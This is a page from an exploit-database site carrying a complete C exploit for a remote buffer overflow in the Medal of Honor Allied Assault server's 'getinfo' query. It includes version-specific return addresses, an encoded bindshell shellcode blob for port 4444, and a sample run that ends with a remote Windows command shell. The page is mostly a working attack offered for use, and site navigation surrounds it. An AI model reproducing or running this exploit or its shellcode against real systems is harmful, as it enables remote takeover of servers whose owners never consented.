0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Medal of Honor (getinfo) Remote Buffer Overflow Exploit
[=======================================================
Medal of Honor (getinfo) Remote Buffer Overflow Exploit
=======================================================
/*
MOHAA Win32 Server Buffer-Overflow Exploit (getinfo)
Written by RunningBon
Please use this responsibly, as I am not responsible for any damage you cause by using it.
IRC: irc.rizon.net #kik
E-mail: runningbon@gmail.com
Thanks to: Luigi Auriemma, Metasploit, everyone else (You know who you are.)
Example:
C:\>MOHAAExploit.exe 192.168.2.44 12203 MOHAA-v1.11
MoHAA Server Buffer overflow exploit
Written by RunningBon
E-Mail: runningbon@gmail.com
IRC: irc.rizon.net #kik
Attempting to exploit 192.168.2.44:12203, running version MOHAA-v1.11.
Building packet.
Sending packet.
Packet sent.
Check for your shell on port 4444.
C:\>telnet 192.168.2.44 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\EA GAMES\MOHAA>
*/
#include <stdio.h>
#include <windows.h>
struct VersionStruct {
char *pName;
DWORD dwNewEIP;
DWORD dwFillLength;
};
VersionStruct Versions[] = {
"MOHAA-v1.11", 0xCBB935, 516,
"MOHAA:S-v2.15", 0x923575, 516,
//Add MOHAA:Breakthrough support
};
#pragma comment (lib, "ws2_32.lib")
//Port 4444 bindshell
unsigned char szShellcode[] =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x42"
"\xec\xee\x81\x83\xeb\xfc\xe2\xf4\xbe\x86\x05\xcc\xaa\x15\x11\x7e"
"\xbd\x8c\x65\xed\x66\xc8\x65\xc4\x7e\x67\x92\x84\x3a\xed\x01\x0a"
"\x0d\xf4\x65\xde\x62\xed\x05\xc8\xc9\xd8\x65\x80\xac\xdd\x2e\x18"
"\xee\x68\x2e\xf5\x45\x2d\x24\x8c\x43\x2e\x05\x75\x79\xb8\xca\xa9"
"\x37\x09\x65\xde\x66\xed\x05\xe7\xc9\xe0\xa5\x0a\x1d\xf0\xef\x6a"
"\x41\xc0\x65\x08\x2e\xc8\xf2\xe0\x81\xdd\x35\xe5\xc9\xaf\xde\x0a"
"\x02\xe0\x65\xf1\x5e\x41\x65\xc1\x4a\xb2\x86\x0f\x0c\xe2\x02\xd1"
"\xbd\x3a\x88\xd2\x24\x84\xdd\xb3\x2a\x9b\x9d\xb3\x1d\xb8\x11\x51"
"\x2a\x27\x03\x7d\x79\xbc\x11\x57\x1d\x65\x0b\xe7\xc3\x01\xe6\x83"
"\x17\x86\xec\x7e\x92\x84\x37\x88\xb7\x41\xb9\x7e\x94\xbf\xbd\xd2"
"\x11\xbf\xad\xd2\x01\xbf\x11\x51\x24\x84\xff\xdd\x24\xbf\x67\x60"
"\xd7\x84\x4a\x9b\x32\x2b\xb9\x7e\x94\x86\xfe\xd0\x17\x13\x3e\xe9"
"\xe6\x41\xc0\x68\x15\x13\x38\xd2\x17\x13\x3e\xe9\xa7\xa5\x68\xc8"
"\x15\x13\x38\xd1\x16\xb8\xbb\x7e\x92\x7f\x86\x66\x3b\x2a\x97\xd6"
"\xbd\x3a\xbb\x7e\x92\x8a\x84\xe5\x24\x84\x8d\xec\xcb\x09\x84\xd1"
"\x1b\xc5\x22\x08\xa5\x86\xaa\x08\xa0\xdd\x2e\x72\xe8\x12\xac\xac"
"\xbc\xae\xc2\x12\xcf\x96\xd6\x2a\xe9\x47\x86\xf3\xbc\x5f\xf8\x7e"
"\x37\xa8\x11\x57\x19\xbb\xbc\xd0\x13\xbd\x84\x80\x13\xbd\xbb\xd0"
"\xbd\x3c\x86\x2c\x9b\xe9\x20\xd2\xbd\x3a\x84\x7e\xbd\xdb\x11\x51"
"\xc9\xbb\x12\x02\x86\x88\x11\x57\x10\x13\x3e\xe9\xb2\x66\xea\xde"
"\x11\x13\x38\x7e\x92\xec\xee\x81";
void Error(char *pString)
{
printf("[ERROR] %s\n", pString);
ExitProcess(0);
}
int Exploit(char *pIP, int iPort, VersionStruct *pVersion)
{
WSAData WSADATA;
SOCKET Socket = NULL;
sockaddr_in SockAddr;
char szHeader[] = "\xff\xff\xff\xff\x02getinfo ";
char szBuffer[4096];
int iLen = 0;
WSAStartup(MAKEWORD(1, 1), &WSADATA);
if((Socket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == SOCKET_ERROR)
{
Error("socket()");
return 0;
}
SockAddr.sin_addr.s_addr = inet_addr(pIP);
SockAddr.sin_port = htons(iPort);
SockAddr.sin_family = AF_INET;
printf("Building packet.\n");
memset(szBuffer, 0, sizeof(szBuffer));
memcpy(szBuffer, szHeader, sizeof(szHeader) - 1);
iLen += sizeof(szHeader) - 1;
memset(szBuffer + iLen, 'z', pVersion->dwFillLength);
iLen += pVersion->dwFillLength;
memcpy(szBuffer + iLen, (LPVOID)&pVersion->dwNewEIP, sizeof(DWORD));
iLen += sizeof(DWORD);
memcpy(szBuffer + iLen, szShellcode, sizeof(szShellcode));
iLen += sizeof(szShellcode);
printf("Sending packet.\n");
if(sendto(Socket, szBuffer, iLen, 0, (sockaddr*)&SockAddr, sizeof(SockAddr)) == SOCKET_ERROR)
{
Error("sendto()");
return 0;
}
printf("Packet sent.\n");
return 1;
}
void PrintWelcome()
{
printf(
"MoHAA Server Buffer overflow exploit\n"
"Written by RunningBon\n"
"E-Mail: runningbon@gmail.com\n"
"IRC: irc.rizon.net #kik\n"
"\n"
);
}
void PrintUsage(char *pPath)
{
printf("Usage: %s <IP> <Port> <Version Name>\n\n", pPath);
printf("Supported Version List:\n");
for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
{
printf("%s\n", Versions[i].pName);
}
}
int main(int argc, char **argv)
{
VersionStruct *pVersion = NULL;
PrintWelcome();
if(argc < 4)
{
PrintUsage(argv[0]);
return 0;
}
for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
{
if(!stricmp(argv[3], Versions[i].pName))
{
pVersion = &Versions[i];
break;
}
}
if(pVersion == NULL)
{
Error("Invalid version.");
}
printf("Attempting to exploit %s:%d, running version %s.\n", argv[1], atoi(argv[2]), pVersion->pName);
if(Exploit(argv[1], atoi(argv[2]), pVersion))
{
printf("Check for your shell on port 4444.\n");
}
return 0;
}
# 0day.today [2024-12-26] #